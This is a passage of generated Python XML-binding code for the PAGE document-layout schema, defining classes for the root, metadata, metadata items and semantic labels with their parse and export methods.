        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PcGtsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PcGtsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PcGtsType'):
        if self.pcGtsId is not None and 'pcGtsId' not in already_processed:
            already_processed.add('pcGtsId')
            outfile.write(' pcGtsId=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.pcGtsId), input_name='pcGtsId')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PcGtsType', fromsubclass_=False, pretty_print=True):
        if self.Metadata is not None:
            namespaceprefix_ = self.Metadata_nsprefix_ + ':' if (UseCapturedNS_ and self.Metadata_nsprefix_) else ''
            self.Metadata.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Metadata', pretty_print=pretty_print)
        if self.Page is not None:
            namespaceprefix_ = self.Page_nsprefix_ + ':' if (UseCapturedNS_ and self.Page_nsprefix_) else ''
            self.Page.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Page', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('pcGtsId', node)
        if value is not None and 'pcGtsId' not in already_processed:
            already_processed.add('pcGtsId')
            self.pcGtsId = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the local tag name of the child element.
        if nodeName_ == 'Metadata':
            obj_ = MetadataType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Metadata = obj_
            obj_.original_tagname_ = 'Metadata'
        elif nodeName_ == 'Page':
            obj_ = PageType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Page = obj_
            obj_.original_tagname_ = 'Page'
    def get_imageFilename(self):
        '''
        Get image filename from root.

        Convenience accessor for ``Page.imageFilename``; raises
        AttributeError when ``Page`` is None.
        '''
        return self.Page.imageFilename
# end class PcGtsType
class MetadataType(GeneratedsSuper):
    """PAGE ``Metadata`` element: creator, creation / last-change timestamps,
    free-text comments, optional user-defined data and metadata items.

    The ``externalRef`` attribute is an external reference of any kind.
    Generated (generateDS-style) binding class; same build/export pattern
    as the other binding classes in this module.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema introspection table: one MemberSpec_ per attribute / child.
    member_data_items_ = [
        MemberSpec_('externalRef', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('Creator', 'string', 0, 0, {'name': 'Creator', 'type': 'string'}, None),
        MemberSpec_('Created', 'dateTime', 0, 0, {'name': 'Created', 'type': 'dateTime'}, None),
        MemberSpec_('LastChange', 'dateTime', 0, 0, {'name': 'LastChange', 'type': 'dateTime'}, None),
        MemberSpec_('Comments', 'string', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Comments', 'type': 'string'}, None),
        MemberSpec_('UserDefined', 'UserDefinedType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'UserDefined', 'type': 'UserDefinedType'}, None),
        MemberSpec_('MetadataItem', 'MetadataItemType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'MetadataItem', 'type': 'MetadataItemType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, externalRef=None, Creator=None, Created=None, LastChange=None, Comments=None, UserDefined=None, MetadataItem=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
        self.externalRef = _cast(None, externalRef)
        self.externalRef_nsprefix_ = None
        self.Creator = Creator
        self.Creator_nsprefix_ = None
        if isinstance(Created, BaseStrType_):
            # NOTE(review): constructor parsing accepts only plain
            # "YYYY-mm-ddTHH:MM:SS" (no fractional seconds / timezone),
            # whereas buildChildren() uses the more lenient
            # gds_parse_datetime — confirm this asymmetry is intended.
            initvalue_ = datetime_.datetime.strptime(Created, '%Y-%m-%dT%H:%M:%S')
        else:
            initvalue_ = Created
        self.Created = initvalue_
        self.Created_nsprefix_ = None
        if isinstance(LastChange, BaseStrType_):
            # Same strict format as Created above.
            initvalue_ = datetime_.datetime.strptime(LastChange, '%Y-%m-%dT%H:%M:%S')
        else:
            initvalue_ = LastChange
        self.LastChange = initvalue_
        self.LastChange_nsprefix_ = None
        self.Comments = Comments
        self.Comments_nsprefix_ = None
        self.UserDefined = UserDefined
        self.UserDefined_nsprefix_ = "pc"
        if MetadataItem is None:
            self.MetadataItem = []
        else:
            self.MetadataItem = MetadataItem
        self.MetadataItem_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, delegating to a registered subclass if any."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, MetadataType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if MetadataType.subclass:
            return MetadataType.subclass(*args_, **kwargs_)
        else:
            return MetadataType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Creator(self):
        return self.Creator
    def set_Creator(self, Creator):
        self.Creator = Creator
    def get_Created(self):
        return self.Created
    def set_Created(self, Created):
        self.Created = Created
    def get_LastChange(self):
        return self.LastChange
    def set_LastChange(self, LastChange):
        self.LastChange = LastChange
    def get_Comments(self):
        return self.Comments
    def set_Comments(self, Comments):
        self.Comments = Comments
    def get_UserDefined(self):
        return self.UserDefined
    def set_UserDefined(self, UserDefined):
        self.UserDefined = UserDefined
    def get_MetadataItem(self):
        return self.MetadataItem
    def set_MetadataItem(self, MetadataItem):
        self.MetadataItem = MetadataItem
    def add_MetadataItem(self, value):
        self.MetadataItem.append(value)
    def insert_MetadataItem_at(self, index, value):
        self.MetadataItem.insert(index, value)
    def replace_MetadataItem_at(self, index, value):
        self.MetadataItem[index] = value
    def get_externalRef(self):
        return self.externalRef
    def set_externalRef(self, externalRef):
        self.externalRef = externalRef
    def hasContent_(self):
        # True when at least one child element is present (controls whether
        # export() writes an open/close pair or a self-closing tag).
        if (
            self.Creator is not None or
            self.Created is not None or
            self.LastChange is not None or
            self.Comments is not None or
            self.UserDefined is not None or
            self.MetadataItem
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='MetadataType', pretty_print=True):
        """Write this element (attributes and children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('MetadataType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'MetadataType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MetadataType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MetadataType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MetadataType'):
        if self.externalRef is not None and 'externalRef' not in already_processed:
            already_processed.add('externalRef')
            outfile.write(' externalRef=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalRef), input_name='externalRef')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15" xmlns:None="http://www.w3.org/2001/XMLSchema" ', name_='MetadataType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Creator is not None:
            namespaceprefix_ = self.Creator_nsprefix_ + ':' if (UseCapturedNS_ and self.Creator_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sCreator>%s</%sCreator>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Creator), input_name='Creator')), namespaceprefix_ , eol_))
        if self.Created is not None:
            namespaceprefix_ = self.Created_nsprefix_ + ':' if (UseCapturedNS_ and self.Created_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sCreated>%s</%sCreated>%s' % (namespaceprefix_ , self.gds_format_datetime(self.Created, input_name='Created'), namespaceprefix_ , eol_))
        if self.LastChange is not None:
            namespaceprefix_ = self.LastChange_nsprefix_ + ':' if (UseCapturedNS_ and self.LastChange_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sLastChange>%s</%sLastChange>%s' % (namespaceprefix_ , self.gds_format_datetime(self.LastChange, input_name='LastChange'), namespaceprefix_ , eol_))
        if self.Comments is not None:
            namespaceprefix_ = self.Comments_nsprefix_ + ':' if (UseCapturedNS_ and self.Comments_nsprefix_) else ''
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sComments>%s</%sComments>%s' % (namespaceprefix_ , self.gds_encode(self.gds_format_string(quote_xml(self.Comments), input_name='Comments')), namespaceprefix_ , eol_))
        if self.UserDefined is not None:
            namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
            self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
        for MetadataItem_ in self.MetadataItem:
            namespaceprefix_ = self.MetadataItem_nsprefix_ + ':' if (UseCapturedNS_ and self.MetadataItem_nsprefix_) else ''
            MetadataItem_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MetadataItem', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('externalRef', node)
        if value is not None and 'externalRef' not in already_processed:
            already_processed.add('externalRef')
            self.externalRef = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the local tag name of the child element.
        if nodeName_ == 'Creator':
            value_ = child_.text
            value_ = self.gds_parse_string(value_, node, 'Creator')
            value_ = self.gds_validate_string(value_, node, 'Creator')
            self.Creator = value_
            self.Creator_nsprefix_ = child_.prefix
        elif nodeName_ == 'Created':
            sval_ = child_.text
            dval_ = self.gds_parse_datetime(sval_)
            self.Created = dval_
            self.Created_nsprefix_ = child_.prefix
        elif nodeName_ == 'LastChange':
            sval_ = child_.text
            dval_ = self.gds_parse_datetime(sval_)
            self.LastChange = dval_
            self.LastChange_nsprefix_ = child_.prefix
        elif nodeName_ == 'Comments':
            value_ = child_.text
            value_ = self.gds_parse_string(value_, node, 'Comments')
            value_ = self.gds_validate_string(value_, node, 'Comments')
            self.Comments = value_
            self.Comments_nsprefix_ = child_.prefix
        elif nodeName_ == 'UserDefined':
            obj_ = UserDefinedType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.UserDefined = obj_
            obj_.original_tagname_ = 'UserDefined'
        elif nodeName_ == 'MetadataItem':
            obj_ = MetadataItemType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.MetadataItem.append(obj_)
            obj_.original_tagname_ = 'MetadataItem'
# end class MetadataType
class MetadataItemType(GeneratedsSuper):
    """A single metadata item: a ``type`` (e.g. author, imageProperties),
    a ``name`` (e.g. "imagePhotometricInterpretation"), a required
    ``value`` (e.g. "RGB"), an optional ``date`` and optional semantic
    ``Labels`` children.

    Generated (generateDS-style) binding class; same build/export pattern
    as the other binding classes in this module.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema introspection table: one MemberSpec_ per attribute / child.
    member_data_items_ = [
        MemberSpec_('type_', 'typeType', 0, 1, {'use': 'optional'}),
        MemberSpec_('name', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('value', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('date', 'dateTime', 0, 1, {'use': 'optional'}),
        MemberSpec_('Labels', 'LabelsType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Labels', 'type': 'LabelsType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, type_=None, name=None, value=None, date=None, Labels=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.name = _cast(None, name)
        self.name_nsprefix_ = None
        self.value = _cast(None, value)
        self.value_nsprefix_ = None
        if isinstance(date, BaseStrType_):
            # NOTE(review): constructor parsing accepts only plain
            # "YYYY-mm-ddTHH:MM:SS"; buildAttributes() uses the more
            # lenient gds_parse_datetime — confirm this is intended.
            initvalue_ = datetime_.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S')
        else:
            initvalue_ = date
        self.date = initvalue_
        if Labels is None:
            self.Labels = []
        else:
            self.Labels = Labels
        self.Labels_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, delegating to a registered subclass if any."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, MetadataItemType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if MetadataItemType.subclass:
            return MetadataItemType.subclass(*args_, **kwargs_)
        else:
            return MetadataItemType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Labels(self):
        return self.Labels
    def set_Labels(self, Labels):
        self.Labels = Labels
    def add_Labels(self, value):
        self.Labels.append(value)
    def insert_Labels_at(self, index, value):
        self.Labels.insert(index, value)
    def replace_Labels_at(self, index, value):
        self.Labels[index] = value
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_name(self):
        return self.name
    def set_name(self, name):
        self.name = name
    def get_value(self):
        return self.value
    def set_value(self, value):
        self.value = value
    def get_date(self):
        return self.date
    def set_date(self, date):
        self.date = date
    def validate_typeType(self, value):
        """Validate *value* against the typeType XSD enumeration.

        Returns True when the value is acceptable (or validation is
        skipped because it is None / disabled / no collector is set),
        False otherwise.  Problems are reported via gds_collector_.
        """
        # Fixed: the generated original assigned ``result = False`` without
        # ever initialising or returning it, so the method returned None for
        # valid values and False only for non-str input.  Now it returns a
        # consistent boolean (callers that ignored the return are unaffected).
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['author', 'imageProperties', 'processingStep', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on typeType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        # True when at least one Labels child is present (controls whether
        # export() writes an open/close pair or a self-closing tag).
        if (
            self.Labels
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MetadataItemType', pretty_print=True):
        """Write this element (attributes and children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('MetadataItemType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'MetadataItemType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MetadataItemType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MetadataItemType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MetadataItemType'):
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
        if self.value is not None and 'value' not in already_processed:
            already_processed.add('value')
            outfile.write(' value=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.value), input_name='value')), ))
        if self.date is not None and 'date' not in already_processed:
            already_processed.add('date')
            outfile.write(' date="%s"' % self.gds_format_datetime(self.date, input_name='date'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MetadataItemType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Labels_ in self.Labels:
            namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
            Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_typeType(self.type_)    # validate type typeType
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
        value = find_attr_value_('value', node)
        if value is not None and 'value' not in already_processed:
            already_processed.add('value')
            self.value = value
        value = find_attr_value_('date', node)
        if value is not None and 'date' not in already_processed:
            already_processed.add('date')
            try:
                self.date = self.gds_parse_datetime(value)
            except ValueError as exp:
                raise ValueError('Bad date-time attribute (date): %s' % exp)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the local tag name of the child element.
        if nodeName_ == 'Labels':
            obj_ = LabelsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Labels.append(obj_)
            obj_.original_tagname_ = 'Labels'
# end class MetadataItemType
class LabelsType(GeneratedsSuper):
    """Container for semantic ``Label`` elements.

    ``externalModel``: reference to an external model / ontology / schema.
    ``externalId``: e.g. an RDF resource identifier (to be used as subject
    or object of an RDF triple).
    ``prefix``: prefix applied to all labels (e.g. first part of an URI).
    Generated (generateDS-style) binding class; same build/export pattern
    as the other binding classes in this module.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema introspection table: one MemberSpec_ per attribute / child.
    member_data_items_ = [
        MemberSpec_('externalModel', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('externalId', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('prefix', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('Label', 'LabelType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'Label', 'type': 'LabelType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, externalModel=None, externalId=None, prefix=None, comments=None, Label=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.externalModel = _cast(None, externalModel)
        self.externalModel_nsprefix_ = None
        self.externalId = _cast(None, externalId)
        self.externalId_nsprefix_ = None
        self.prefix = _cast(None, prefix)
        self.prefix_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        if Label is None:
            self.Label = []
        else:
            self.Label = Label
        self.Label_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, delegating to a registered subclass if any."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, LabelsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if LabelsType.subclass:
            return LabelsType.subclass(*args_, **kwargs_)
        else:
            return LabelsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Label(self):
        return self.Label
    def set_Label(self, Label):
        self.Label = Label
    def add_Label(self, value):
        self.Label.append(value)
    def insert_Label_at(self, index, value):
        self.Label.insert(index, value)
    def replace_Label_at(self, index, value):
        self.Label[index] = value
    def get_externalModel(self):
        return self.externalModel
    def set_externalModel(self, externalModel):
        self.externalModel = externalModel
    def get_externalId(self):
        return self.externalId
    def set_externalId(self, externalId):
        self.externalId = externalId
    def get_prefix(self):
        return self.prefix
    def set_prefix(self, prefix):
        self.prefix = prefix
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def hasContent_(self):
        # True when at least one Label child is present (controls whether
        # export() writes an open/close pair or a self-closing tag).
        if (
            self.Label
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelsType', pretty_print=True):
        """Write this element (attributes and children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('LabelsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'LabelsType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='LabelsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='LabelsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='LabelsType'):
        if self.externalModel is not None and 'externalModel' not in already_processed:
            already_processed.add('externalModel')
            outfile.write(' externalModel=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalModel), input_name='externalModel')), ))
        if self.externalId is not None and 'externalId' not in already_processed:
            already_processed.add('externalId')
            outfile.write(' externalId=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.externalId), input_name='externalId')), ))
        if self.prefix is not None and 'prefix' not in already_processed:
            already_processed.add('prefix')
            outfile.write(' prefix=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.prefix), input_name='prefix')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelsType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Label_ in self.Label:
            namespaceprefix_ = self.Label_nsprefix_ + ':' if (UseCapturedNS_ and self.Label_nsprefix_) else ''
            Label_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Label', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('externalModel', node)
        if value is not None and 'externalModel' not in already_processed:
            already_processed.add('externalModel')
            self.externalModel = value
        value = find_attr_value_('externalId', node)
        if value is not None and 'externalId' not in already_processed:
            already_processed.add('externalId')
            self.externalId = value
        value = find_attr_value_('prefix', node)
        if value is not None and 'prefix' not in already_processed:
            already_processed.add('prefix')
            self.prefix = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the local tag name of the child element.
        if nodeName_ == 'Label':
            obj_ = LabelType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Label.append(obj_)
            obj_.original_tagname_ = 'Label'
# end class LabelsType
class LabelType(GeneratedsSuper):
    """One semantic label / tag (e.g. 'person').

    XML attributes (all stored as plain strings):
      * value    -- the label / tag itself; may be an RDF resource
                    identifier (e.g. the object of an RDF triple). Required.
      * type_    -- additional information on the label (e.g. 'YYYY-mm-dd'
                    for a date label); can be used as the predicate of an
                    RDF triple. Optional.
      * comments -- free-form comments. Optional.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema-derived member metadata consumed by the generateDS runtime.
    member_data_items_ = [
        MemberSpec_('value', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('type_', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, value=None, type_=None, comments=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Each member has a companion *_nsprefix_ slot used on export.
        self.value = _cast(None, value)
        self.value_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Instantiation honours, in order: an externally registered subclass
        # module, the class-level `subclass` hook, then LabelType itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, LabelType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if LabelType.subclass:
            return LabelType.subclass(*args_, **kwargs_)
        else:
            return LabelType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_value(self):
        return self.value
    def set_value(self, value):
        self.value = value
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def hasContent_(self):
        # LabelType has no child elements, so the generated condition is an
        # empty (always-false) tuple and this method always returns False.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LabelType', pretty_print=True):
        # Serialize this element to *outfile*; attributes always, children
